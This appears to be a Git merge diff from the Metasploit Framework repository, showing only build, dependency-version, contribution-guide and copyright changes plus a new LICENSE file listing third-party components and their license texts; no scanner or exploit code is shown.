Merge pull request #1405 from rapid7/add/upnp-scanner

Adds CVE reporting to the UPnP scanner

.gitignore

@@ -10,7 +10,7 @@
 coverage
 data/meterpreter/ext_server_pivot.dll
 data/meterpreter/ext_server_pivot.x64.dll
-doc
+doc/
 external/source/meterpreter/java/bin
 external/source/meterpreter/java/build
 external/source/meterpreter/java/extensions
@@ -22,3 +22,4 @@ tags
 *.swp
 *.orig
 *.rej
+*~

.travis.yml

@@ -1,8 +1,10 @@
 language: ruby
 rvm:
-  - '1.8.7'
+  #- '1.8.7'
   - '1.9.3'
 
 notifications:
   irc: "irc.freenode.org#msfnotify"
 
+git:
+  depth: 1

CONTRIBUTING.md

@@ -12,6 +12,11 @@ If your bug is new and you'd like to report it you will need to
 first](https://dev.metasploit.com/redmine/account/register). Don't
 worry, it's easy and fun and takes about 30 seconds.
 
+When you file a bug report, please inclue your **steps to reproduce**,
+full copy-pastes of Ruby stack traces, and any relevant details about
+your environment. Without repro steps, your bug will likely be closed.
+With repro steps, your bugs will likely be fixed.
+
 ## Contributing Metasploit Modules
 
 If you have an exploit that you'd like to contribute to the Metasploit

COPYING

@@ -1,4 +1,4 @@
-Copyright (C) 2006-2012, Rapid7 Inc.
+Copyright (C) 2006-2013, Rapid7 Inc.
 All rights reserved.
 
 Redistribution and use in source and binary forms, with or without modification,
@@ -32,22 +32,6 @@ The Metasploit Framework is provided under the 3-clause BSD license above.
 
 The copyright on this package is held by Rapid7 LLC.
 
-This license does not apply to the following components:
- - The Bit-Struct library located under lib/bit-struct
- - The OpenSSL library embedded into the Meterpreter payload binaries and the
-   corresponding header files in the source tree
- - The Packet Sniffer SDK (MicroOLAP) library embedded into the Meterpreter
-   Sniffer extension. HD Moore has a single-seat developer license.
- - The modified TightVNC binaries and their associated source code.
- - The Byakugan plugin located under external/source/byakugan
- - The Metasm library located under lib/metasm
- - The PcapRub library located under external/pcaprub
- - The Rabal library located under lib/rabal
- - The PacketFu library located under lib/packetfu
- - The Ruby-Lorcon library located under external/ruby-lorcon
- - The SNMP library located under lib/snmp
- - The Zip library located under lib/zip
- - The SSHKey library located under lib/sshkey
-
-Details for the above packages can be found in the THIRD-PARTY file.
+This license does not apply to several components within the Metasploit
+Framework source tree.  For more details see the LICENSE file.
 

Gemfile

@@ -23,7 +23,7 @@ end
 
 group :test do
   # testing framework
-  gem 'rspec'
+  gem 'rspec', '>= 2.12'
   # code coverage for tests
   # any version newer than 0.5.4 gives an Encoding error when trying to read the source files.
   gem 'simplecov', '0.5.4', :require => false

Gemfile.lock

@@ -12,46 +12,46 @@ GIT
 GEM
   remote: http://rubygems.org/
   specs:
-    activemodel (3.2.8)
-      activesupport (= 3.2.8)
+    activemodel (3.2.9)
+      activesupport (= 3.2.9)
       builder (~> 3.0.0)
-    activerecord (3.2.8)
-      activemodel (= 3.2.8)
-      activesupport (= 3.2.8)
+    activerecord (3.2.9)
+      activemodel (= 3.2.9)
+      activesupport (= 3.2.9)
       arel (~> 3.0.2)
       tzinfo (~> 0.3.29)
-    activesupport (3.2.8)
+    activesupport (3.2.9)
       i18n (~> 0.6)
       multi_json (~> 1.0)
     arel (3.0.2)
-    builder (3.0.3)
+    builder (3.0.4)
     coderay (1.0.8)
     diff-lcs (1.1.3)
     i18n (0.6.1)
     method_source (0.8.1)
-    multi_json (1.3.6)
+    multi_json (1.0.4)
     pg (0.14.1)
     pry (0.9.10)
       coderay (~> 1.0.5)
       method_source (~> 0.8)
       slop (~> 3.3.1)
-    rake (0.9.2.2)
-    redcarpet (2.1.1)
-    rspec (2.11.0)
-      rspec-core (~> 2.11.0)
-      rspec-expectations (~> 2.11.0)
-      rspec-mocks (~> 2.11.0)
-    rspec-core (2.11.1)
-    rspec-expectations (2.11.3)
+    rake (10.0.2)
+    redcarpet (2.2.2)
+    rspec (2.12.0)
+      rspec-core (~> 2.12.0)
+      rspec-expectations (~> 2.12.0)
+      rspec-mocks (~> 2.12.0)
+    rspec-core (2.12.1)
+    rspec-expectations (2.12.0)
       diff-lcs (~> 1.1.3)
-    rspec-mocks (2.11.3)
+    rspec-mocks (2.12.0)
     simplecov (0.5.4)
       multi_json (~> 1.0.3)
       simplecov-html (~> 0.5.3)
     simplecov-html (0.5.3)
     slop (3.3.3)
-    tzinfo (0.3.33)
-    yard (0.8.2.1)
+    tzinfo (0.3.35)
+    yard (0.8.3)
 
 PLATFORMS
   ruby
@@ -63,6 +63,6 @@ DEPENDENCIES
   pg (>= 0.11)
   rake
   redcarpet
-  rspec
+  rspec (>= 2.12)
   simplecov (= 0.5.4)
   yard

LICENSE

@@ -0,0 +1,1168 @@
+Format: http://www.debian.org/doc/packaging-manuals/copyright-format/1.0/
+Source: http://www.metasploit.com/
+
+Files: *
+Copyright: 2006-2013, Rapid7 Inc.
+License: BSD-3-clause
+
+# The Metasploit Framework is provided under the 3-clause BSD license provided
+# at the end of this file.
+#
+# The copyright on this package is held by Rapid7 LLC.
+#
+# This license does not apply to third-party components detailed below.
+#
+
+Files: data/john/*
+Copyright: 1996-2011 Solar Designer.
+License: GPL-2
+
+Files: external/pcaprub/*
+Copyright: 2007-2008, Alastair Houghton
+License: LGPL-2.1
+
+Files: external/ruby-kissfft/*
+Copyright: 2003-2010 Mark Borgerding
+           2009-2012 H D Moore <hdm[at]rapid7.com>
+License: BSD-3-clause
+
+Files: external/ruby-lorcon/*
+Copyright: 2005, dragorn and Joshua Wright
+License: LGPL-2.1
+
+Files: external/source/armitage/* data/armitage/*
+Copyright: 2010-2012 Raphael Mudge
+License: BSD-3-clause
+
+Files: external/source/byakugan/*
+Copyright: Lurene Grenier, 2009
+License: BSD-3-clause
+
+Files: external/source/gui/msfguijava/* data/gui/*
+Copyright: 2010 scriptjunkie
+License: BSD-3-clause
+
+Files: external/source/ipwn/*
+Copyright: 2004-2005 vlad902 <vlad902 [at] gmail.com>
+           2007 H D Moore <hdm [at] metasploit.com>
+License: GPL-2 and Artistic
+
+Files: external/source/meterpreter/ReflectiveDLLInjection/*
+Copyright: 2009, Stephen Fewer of Harmony Security (www.harmonysecurity.com)
+License: BSD-3-clause
+
+Files: external/source/meterpreter/source/common/queue.h
+Copyright: 1991, 1993 The Regents of the University of California
+License: BSD-3-clause
+
+Files: external/source/meterpreter/source/common/zlib/* external/source/meterpreter/source/server/zlib/*
+Copyright: 1995-1996 Jean-loup Gailly and Mark Adler
+License: Zlib
+
+Files: external/source/meterpreter/source/bionic/libc/*
+Copyright: 2005-2008, The Android Open Source Project
+           2004 by Internet Systems Consortium, Inc. ("ISC")
+           1995,1996,1999 by Internet Software Consortium
+           1995 by International Business Machines, Inc.
+           1997,1998,1999,2004 The NetBSD Foundation, Inc.
+           1993 Christopher G. Demetriou
+           1983,1985,1989,1993 The Regents of the University of California
+           2000 Ben Harris
+           1995,1996,1997,1998 WIDE Project
+           2003 Networks Associates Technology, Inc.
+           1993 by Digital Equipment Corporation
+           1997 Mark Brinicombe
+           1993 Martin Birgmeier
+           1993 by Sun Microsystems, Inc.
+           1997, 2005 Todd C. Miller <Todd.Miller@courtesan.com>
+           1995, 1996 Carnegie-Mellon University
+           2003 Networks Associates Technology, Inc.
+License: BSD-3-clause and BSD-4-clause
+
+Files: external/source/meterpreter/source/bionic/libdl/*
+Copyright: 2007 The Android Open Source Project
+License: BSD-3-clause
+
+Files: external/source/meterpreter/source/bionic/libm/*
+Copyright: 2003, Steven G. Kargl
+           2003 Mike Barcroft <mike@FreeBSD.org>
+           2002-2005 David Schultz <das@FreeBSD.ORG>
+           2004 Stefan Farfeleder
+           2003 Dag-Erling Coïdan Smørgrav
+           1996 The NetBSD Foundation, Inc.
+           1985,1988,1991,1992,1993 The Regents of the University of California
+           1993,94 Winning Strategies, Inc.
+           1993, 2004 by Sun Microsystems, Inc.
+License: BSD-2-clause and BSD-3-clause and BSD-4-clause
+
+Files: external/source/meterpreter/source/extensions/espia/screen.c
+Copyright: 1994-2008, Mark Hammond
+License: BSD-2-clause
+
+Files: external/source/meterpreter/source/extensions/priv/server/timestomp.c
+Copyright: 2005 Vincent Liu
+License: GPL-2
+
+Files: external/source/meterpreter/source/extensions/stdapi/server/webcam/bmp2jpeg.c external/source/meterpreter/source/screenshot/bmp2jpeg.c
+Copyright: 1994-2008, Mark Hammond
+License: BSD-2-clause
+
+Files: external/source/meterpreter/source/extensions/stdapi/server/railgun/railgun.c
+Copyright: 2010, patrickHVE@googlemail.com
+License: BSD-2-clause
+
+Files: external/source/meterpreter/source/pssdk/*
+Copyright: microOLAP
+License: N/A
+Comment: HD Moore holds a single-seat developer license for the Packet Sniffer
+         SDK library embedded into the Meterpreter Sniffer extension.  This
+         source code is not distributed with Metasploit Framework.
+
+Files: external/source/meterpreter/source/openssl/*
+Copyright: 1998-2002 The OpenSSL Project
+License: OpenSSL and SSLeay
+
+Files: external/source/meterpreter/source/server/posix/sfsyscall.h
+Copyright: 2003  Philippe Biondi <biondi@cartel-securite.fr>
+License: LGPL
+
+Files: external/source/meterpreter/source/jpeg-8/*
+Copyright: 1991-2010, Thomas G. Lane, Guido Vollbeding
+License: BSD-3-clause
+
+Files: external/source/meterpreter/source/libpcap/*
+Copyright: 1990, 1991, 1992, 1993, 1994, 1995, 1996, 1997 The Regents of the University of California.
+License: BSD-4-clause
+
+Files: external/source/metsvc/*
+Copyright: 2007, Determina Inc.
+License: BSD-3-clause
+
+Files: external/source/tightvnc/*
+Copyright: 1999 AT&T Laboratories Cambridge.
+           2000 Tridia Corp.
+           2002-2003 RealVNC Ltd.
+           2001-2004 HorizonLive.com, Inc.
+           2000-2007 Constantin Kaplinsky
+           2000-2009 TightVNC Group
+License: GPL-2
+
+Files: external/source/unixasm/*
+Copyright: 2004-2008 Ramon de Carvalho Valle <ramon@risesecurity.org>
+License: BSD-4-clause
+
+Files: external/source/vncdll/winvnc/*
+Copyright: 1999 AT&T Laboratories Cambridge.
+           2000 Tridia Corp.
+           2002-2003 RealVNC Ltd.
+           2001-2004 HorizonLive.com, Inc.
+           2000-2006 Constantin Kaplinsky.
+           2000-2009 TightVNC Group
+License: GPL-2
+
+Files: lib/anemone.rb lib/anemone/*
+Copyright: 2009 Vertive, Inc.
+License: MIT
+
+Files: lib/bit-struct.rb lib/bit-struct/*
+Copyright: 2005-2009, Joel VanderWerf
+License: Ruby
+
+Files: lib/fastlib.rb
+Copyright: 2011, Rapid7 Inc.
+License: Ruby
+
+Files: lib/gemcache/ruby/1.9.1/arch/*/eventmachine-*/*
+Copyright: 2006-2007, Francis Cianfrocca
+License: Ruby
+
+Files: lib/gemcache/ruby/1.9.1/arch/*/json-*/*
+Copyright: Daniel Luz <dev at mernen dot com>
+License: Ruby
+
+Files: lib/gemcache/ruby/1.9.1/arch/*/msgpack-*/*
+Copyright: Austin Ziegler
+License: Ruby
+
+Files: lib/gemcache/ruby/1.9.1/arch/*/nokogiri-*/*
+Copyright: 2008 - 2012 Aaron Patterson, Mike Dalessio, Charles Nutter, Sergio Arbeo, Patrick Mahoney, Yoko Harada
+License: MIT
+
+Files: lib/gemcache/ruby/1.9.1/arch/*/pg-*/*
+Copyright: 1997-2012 by the authors
+License: Ruby
+
+Files: lib/gemcache/ruby/1.9.1/arch/*/thin-*/*
+Copyright: Marc-Andre Cournoyer
+License: Ruby
+
+Files: lib/gemcache/ruby/1.9.1/arch/*/win32-api-*/*
+Copyright: 2003-2011, Daniel J. Berger
+License: Artistic
+
+Files: lib/gemcache/ruby/1.9.1/arch/*/win32-service-*/*
+Copyright: 2003-2011, Daniel J. Berger
+License: Artistic
+
+Files: lib/gemcache/ruby/1.9.1/arch/*/windows-api-*/*
+Copyright: 2007-2012, Daniel J. Berger
+License: Artistic
+
+Files: lib/gemcache/ruby/1.9.1/arch/*/windows-pr-*/*
+Copyright: 2006-2010, Daniel J. Berger
+License: Artistic
+
+Files: lib/gemcache/ruby/1.9.1/gems/coderay-*/*
+Copyright: 2006-2011, murphy (Kornelius Kalnback) <murphy rubychan de>
+License: LGPL-2.1
+
+Files: lib/gemcache/ruby/1.9.1/gems/actionmailer-*/*
+Copyright: 2004-2011 David Heinemeier Hansson
+License: MIT
+
+Files: lib/gemcache/ruby/1.9.1/gems/actionpack-*/*
+Copyright: 2004-2011 David Heinemeier Hansson
+License: MIT
+
+Files: lib/gemcache/ruby/1.9.1/gems/activemodel-*/*
+Copyright: 2004-2011 David Heinemeier Hansson
+License: MIT
+
+Files: lib/gemcache/ruby/1.9.1/gems/activerecord-*/*
+Copyright: 2004-2011 David Heinemeier Hansson
+License: MIT
+
+Files: lib/gemcache/ruby/1.9.1/gems/activeresource-*/*
+Copyright: 2006-2011 David Heinemeier Hansson
+License: MIT
+
+Files: lib/gemcache/ruby/1.9.1/gems/activesupport-*/*
+Copyright: 2005-2011 David Heinemeier Hansson
+License: MIT
+
+Files: lib/gemcache/ruby/1.9.1/gems/acts_as_list-*/*
+Copyright: 2007 David Heinemeir Hansson
+License: MIT
+
+Files: lib/gemcache/ruby/1.9.1/gems/arel-*/*
+Copyright: 2007-2010 Nick Kallen, Bryan Helmkamp, Emilio Tagua, Aaron Patterson
+License: MIT
+
+Files: lib/gemcache/ruby/1.9.1/gems/authlogic-*/*
+Copyright: 2011 Ben Johnson of Binary Logic
+License: MIT
+
+Files: lib/gemcache/ruby/1.9.1/gems/builder-*/*
+Copyright: 2003-2012 Jim Weirich (jim.weirich@gmail.com)
+License: MIT
+
+Files: lib/gemcache/ruby/1.9.1/gems/carrierwave-*/*
+Copyright: 2008-2012 Jonas Nicklas
+License: MIT
+
+Files: lib/gemcache/ruby/1.9.1/gems/chunky_png-*/*
+Copyright: 2010 Willem van Bergen
+License: MIT
+
+Files: lib/gemcache/ruby/1.9.1/gems/coderay-*/*
+Copyright: Rob Aldred
+License: MIT
+
+Files: lib/gemcache/ruby/1.9.1/gems/daemons-*/*
+Copyright: 2005-2012 Thomas Uehlinger
+License: MIT
+
+Files: lib/gemcache/ruby/1.9.1/gems/diff-lcs-*/*
+Copyright: 2004-2011 Austin Ziegler
+License: MIT
+
+Files: lib/gemcache/ruby/1.9.1/gems/erubis-*/*
+Copyright: 2006-2011 kuwata-lab.com all rights reserved
+License: MIT
+
+Files: lib/gemcache/ruby/1.9.1/gems/formtastic-*/*
+Copyright: 2008-2010
+License: MIT
+
+Files: lib/gemcache/ruby/1.9.1/gems/fssm-*/*
+Copyright: 2011 Travis Tilley
+License: MIT
+
+Files: lib/gemcache/ruby/1.9.1/gems/hike-*/*
+Copyright: 2011 Sam Stephenson
+License: MIT
+
+Files: lib/gemcache/ruby/1.9.1/gems/i18n-*/*
+Copyright: 2008 The Ruby I18n team
+License: MIT
+
+Files: lib/gemcache/ruby/1.9.1/gems/ice_cube-*/*
+Copyright: 2010-2012 John Crepezzi
+License: MIT
+
+Files: lib/gemcache/ruby/1.9.1/gems/journey-*/*
+Copyright: 2011 Aaron Patternson
+License: MIT
+
+Files: lib/gemcache/ruby/1.9.1/gems/jquery-rails-*/*
+Copyright: 2010 Andre Arko
+License: MIT
+
+Files: lib/gemcache/ruby/1.9.1/gems/liquid-*/*
+Copyright: 2005, 2006 Tobias Luetke
+License: MIT
+
+Files: lib/gemcache/ruby/1.9.1/gems/mail-*/*
+Copyright: 2009, 2010, 2011, 2012 Mikel Lindsaar
+License: MIT
+
+Files: lib/gemcache/ruby/1.9.1/gems/metasploit_data_modules-*/*
+Copyright: 2012 Rapid7, Inc.
+License: MIT
+
+Files: lib/gemcache/ruby/1.9.1/gems/method_source-*/*
+Copyright: 2011 John Mair (banisterfiend)
+License: MIT
+
+Files: lib/gemcache/ruby/1.9.1/gems/multi_json-*/*
+Copyright: 2010 Michael Bleigh, Josh Kalderimis, Erik Michaels-Ober, and Intridea, Inc.
+License: MIT
+
+Files: lib/gemcache/ruby/1.9.1/gems/polyglot-*/*
+Copyright: 2007 Clifford Heath
+License: MIT
+
+Files: lib/gemcache/ruby/1.9.1/gems/prototype_legacy_helper-*/*
+Copyright: No copyright statement provided (unmaintained per https://github.com/rails/prototype_legacy_helper)
+License: MIT
+
+Files: lib/gemcache/ruby/1.9.1/gems/rack-*/*
+Copyright: 2007-2010 Christian Neukirchen <purl.org/net/chneukirchen>
+License: MIT
+
+Files: lib/gemcache/ruby/1.9.1/gems/rack-cache-*/*
+Copyright: 2008 Ryan Tomayko <http://tomayko.com/about>
+License: MIT
+
+Files: lib/gemcache/ruby/1.9.1/gems/rack-ssl-*/*
+Copyright: 2010 Joshua Peek
+License: MIT
+
+Files: lib/gemcache/ruby/1.9.1/gems/rack-test-*/*
+Copyright: 2008-2009 Bryan Helmkamp, Engine Yard Inc.
+License: MIT
+
+Files: lib/gemcache/ruby/1.9.1/gems/railties-*/*
+Copyright: No copyright statement provided
+License: MIT
+
+Files: lib/gemcache/ruby/1.9.1/gems/rake-*/*
+Copyright: 2003, 2004 Jim Weirich
+License: MIT
+
+Files: lib/gemcache/ruby/1.9.1/gems/robots-*/*
+Copyright: 2008 Kyle Maxwell, contributors
+License: MIT
+
+Files: lib/gemcache/ruby/1.9.1/gems/slop-*/*
+Copyright: 2012 Lee Jarvis
+License: MIT
+
+Files: lib/gemcache/ruby/1.9.1/gems/spork-*/*
+Copyright: 2009 Tim Harper
+License: MIT
+
+Files: lib/gemcache/ruby/1.9.1/gems/sprockets-*/*
+Copyright: 2011 Sam Stephenson, Joshua Peek
+License: MIT
+
+Files: lib/gemcache/ruby/1.9.1/gems/state_machine-*/*
+Copyright: 2006-2012 Aaron Pfeifer
+License: MIT
+
+Files: lib/gemcache/ruby/1.9.1/gems/thor-*/*
+Copyright: 2008 Yehuda Katz
+License: MIT
+
+Files: lib/gemcache/ruby/1.9.1/gems/tilt-*/*
+Copyright: 2010 Ryan Tomayko <http://tomayko.com/about>
+License: MIT
+
+Files: lib/gemcache/ruby/1.9.1/gems/treetop-*/*
+Copyright: 2007 Nathan Sobo
+License: MIT
+
+Files: lib/gemcache/ruby/1.9.1/gems/tzinfo-*/*
+Copyright: 2005-2006 Philip Ross
+License: MIT
+
+Files: lib/metasm.rb lib/metasm/* data/cpuinfo/*
+Copyright: 2006-2010 Yoann GUILLOT
+License: LGPL-2.1
+
+Files: lib/nessus/*
+Copyright: Vlatoko Kosturjak
+License: BSD-3-clause
+
+Files: lib/net/dns.rb lib/net/dns/*
+Copyright: 2006 Marco Ceresa
+License: Ruby
+
+Files: lib/net/ssh.rb lib/net/ssh/*
+Copyright: 2008 Jamis Buck <jamis@37signals.com>
+License: MIT
+
+Files: lib/packetfu.rb lib/packetfu/*
+Copyright: 2008-2012 Tod Beardsley
+License: BSD-3-clause
+
+Files: lib/postgres_msf.rb lib/postgres/postgres-pr/message.rb lib/postgres/postgres-pr/connection.rb
+Copyright: 2005 Michael Neumann
+License: BSD-3-clause or Ruby
+
+Files: lib/openvas/*
+Copyright: No copyright statement provided
+License: MIT
+
+Files: lib/rabal/*
+Copyright: Jeremy Hinegadner <jeremy at hinegardner dot org>
+License: Ruby
+
+Files: lib/rbmysql.rb lib/rbmysql/*
+Copyright: 2009 tommy
+License: Ruby
+
+Files: lib/rbreadline.rb
+Copyright: 2009 Park Heesob
+License: BSD-3-clause
+
+Files: lib/rkelly/*
+Copyright: 2007, 2008, 2009 Aaron Patternson, John Barnette
+License: MIT
+
+Files: lib/snmp.rb lib/snmp/*
+Copyright: 2004, David R. Halliday
+License: Ruby
+
+Files: lib/sshkey.rb lib/sshkey/*
+Copyright: 2011 James Miller
+License: MIT
+
+Files: lib/windows_console_color_support.rb
+Copyright: 2011 Michael 'migi' Schierl
+License: BSD-3-clause
+
+Files: lib/zip.rb lib/zip/*
+Copyright: 2002-2004, Thomas Sandergaard
+License: Ruby
+
+Files: modules/payloads/singles/windows/speak_pwned.rb
+Copyright: 2009-2010 Berend-Jan "SkyLined" Wever <berendjanwever@gmail.com>
+License: BSD-3-clause
+
+License: BSD-2-clause
+ Redistribution and use in source and binary forms, with or without modification,
+ are permitted provided that the following conditions are met:
+ .
+ Redistributions of source code must retain the above copyright notice, this
+ list of conditions and the following disclaimer.
+ .
+ Redistributions in binary form must reproduce the above copyright notice, this
+ list of conditions and the following disclaimer in the documentation and/or
+ other materials provided with the distribution.
+ .
+ THIS SOFTWARE IS PROVIDED BY {{THE COPYRIGHT HOLDERS AND CONTRIBUTORS}} "AS IS"
+ AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
+ DISCLAIMED. IN NO EVENT SHALL {{THE COPYRIGHT HOLDER OR CONTRIBUTORS}} BE
+ LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
+ CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE
+ GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
+ LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT
+ OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
+
+License: BSD-3-clause
+ Redistribution and use in source and binary forms, with or without modification,
+ are permitted provided that the following conditions are met:
+ .
+     * Redistributions of source code must retain the above copyright notice,
+     this list of conditions and the following disclaimer.
+ .
+     * Redistributions in binary form must reproduce the above copyright notice,
+     this list of conditions and the following disclaimer in the documentation
+     and/or other materials provided with the distribution.
+ .
+     * Neither the name of Rapid7 LLC nor the names of its contributors
+     may be used to endorse or promote products derived from this software
+     without specific prior written permission.
+ .
+ THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND
+ ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
+ WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
+ DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR
+ ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
+ (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
+ LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON
+ ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
+ (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
+ SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
+
+License: BSD-4-clause
+ Redistribution and use in source and binary forms, with or without
+ modification, are permitted provided that the following conditions are met:
+ 1. Redistributions of source code must retain the above copyright
+    notice, this list of conditions and the following disclaimer.
+ 2. Redistributions in binary form must reproduce the above copyright
+    notice, this list of conditions and the following disclaimer in the
+    documentation and/or other materials provided with the distribution.
+ 3. All advertising materials mentioning features or use of this software
+    must display the following acknowledgement:
+    This product includes software developed by the <organization>.
+ 4. Neither the name of the <organization> nor the
+    names of its contributors may be used to endorse or promote products
+    derived from this software without specific prior written permission.
+ .
+ THIS SOFTWARE IS PROVIDED BY <COPYRIGHT HOLDER> ''AS IS'' AND ANY
+ EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
+ WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
+ DISCLAIMED. IN NO EVENT SHALL <COPYRIGHT HOLDER> BE LIABLE FOR ANY
+ DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
+ (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
+ LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND
+ ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
+ (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
+ SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
+
+License: Ruby
+ 1. You may make and give away verbatim copies of the source form of the
+    software without restriction, provided that you duplicate all of the
+    original copyright notices and associated disclaimers.
+ .
+ 2. You may modify your copy of the software in any way, provided that
+    you do at least ONE of the following:
+ .
+    a) place your modifications in the Public Domain or otherwise
+       make them Freely Available, such as by posting said
+       modifications to Usenet or an equivalent medium, or by allowing
+       the author to include your modifications in the software.
+ .
+    b) use the modified software only within your corporation or
+       organization.
+ .
+    c) rename any non-standard executables so the names do not conflict
+       with standard executables, which must also be provided.
+ .
+    d) make other distribution arrangements with the author.
+ .
+ 3. You may distribute the software in object code or executable
+    form, provided that you do at least ONE of the following:
+ .
+    a) distribute the executables and library files of the software,
+       together with instructions (in the manual page or equivalent)
+       on where to get the original distribution.
+ .
+    b) accompany the distribution with the machine-readable source of
+       the software.
+ .
+    c) give non-standard executables non-standard names, with
+       instructions on where to get the original software distribution.
+ .
+    d) make other distribution arrangements with the author.
+ .
+ 4. You may modify and include the part of the software into any other
+    software (possibly commercial).  But some files in the distribution
+    are not written by the author, so that they are not under this terms.
+    They are gc.c(partly), utils.c(partly), regex.[ch], fnmatch.[ch],
+    glob.c, st.[ch] and some files under the ./missing directory.  See
+    each file for the copying condition.
+ .
+ 5. The scripts and library files supplied as input to or produced as
+    output from the software do not automatically fall under the
+    copyright of the software, but belong to whomever generated them,
+    and may be sold commercially, and may be aggregated with this
+    software.
+ .
+ 6. THIS SOFTWARE IS PROVIDED "AS IS" AND WITHOUT ANY EXPRESS OR
+    IMPLIED WARRANTIES, INCLUDING, WITHOUT LIMITATION, THE IMPLIED
+    WARRANTIES OF MERCHANTIBILITY AND FITNESS FOR A PARTICULAR
+    PURPOSE.
+
+License: GPL-2
+ This program is free software; you can redistribute it
+ and/or modify it under the terms of the GNU General Public
+ License as published by the Free Software Foundation; either
+ version 2 of the License, or (at your option) any later
+ version.
+ .
+ This program is distributed in the hope that it will be
+ useful, but WITHOUT ANY WARRANTY; without even the implied
+ warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR
+ PURPOSE.  See the GNU General Public License for more
+ details.
+ .
+ You should have received a copy of the GNU General Public
+ License along with this package; if not, write to the Free
+ Software Foundation, Inc., 51 Franklin St, Fifth Floor,
+ Boston, MA  02110-1301 USA
+ .
+ On Debian systems, the full text of the GNU General Public
+ License version 2 can be found in the file
+ `/usr/share/common-licenses/GPL-2'.
+
+License: LGPL-2.1
+ This library is free software; you can redistribute it and/or
+ modify it under the terms of the GNU Lesser General Public
+ License as published by the Free Software Foundation; either
+ version 2.1 of the License, or (at your option) any later version.
+ .
+ This library is distributed in the hope that it will be useful,
+ but WITHOUT ANY WARRANTY; without even the implied warranty of
+ MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the GNU
+ Lesser General Public License for more details.
+ .
+ You should have received a copy of the GNU Lesser General Public
+ License along with this library; if not, write to the Free Software
+ Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA  02110-1301  USA
+
+License: OpenSSL
+ Redistribution and use in source and binary forms, with or without
+ modification, are permitted provided that the following conditions
+ are met:
+ .
+ 1. Redistributions of source code must retain the above copyright
+    notice, this list of conditions and the following disclaimer.
+ .
+ 2. Redistributions in binary form must reproduce the above copyright
+    notice, this list of conditions and the following disclaimer in
+    the documentation and/or other materials provided with the
+    distribution.
+ .
+ 3. All advertising materials mentioning features or use of this
+    software must display the following acknowledgment:
+    "This product includes software developed by the OpenSSL Project
+    for use in the OpenSSL Toolkit. (http://www.openssl.org/)"
+ .
+ 4. The names "OpenSSL Toolkit" and "OpenSSL Project" must not be used to
+    endorse or promote products derived from this software without
+    prior written permission. For written permission, please contact
+    openssl-core@openssl.org.
+ .
+ 5. Products derived from this software may not be called "OpenSSL"
+    nor may "OpenSSL" appear in their names without prior written
+    permission of the OpenSSL Project.
+ .
+ 6. Redistributions of any form whatsoever must retain the following
+    acknowledgment:
+    "This product includes software developed by the OpenSSL Project
+    for use in the OpenSSL Toolkit (http://www.openssl.org/)"
+ .
+ THIS SOFTWARE IS PROVIDED BY THE OpenSSL PROJECT `AS IS'' AND ANY
+ EXPRESSED OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
+ PURPOSE ARE DISCLAIMED.  IN NO EVENT SHALL THE OpenSSL PROJECT OR
+ ITS CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
+ SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT
+ NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
+ LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
+ STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
+ ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED
+ OF THE POSSIBILITY OF SUCH DAMAGE.
+ .
+ This product includes cryptographic software written by Eric Young
+ (eay@cryptsoft.com).  This product includes software written by Tim
+ Hudson (tjh@cryptsoft.com).
+
+License: SSLeay
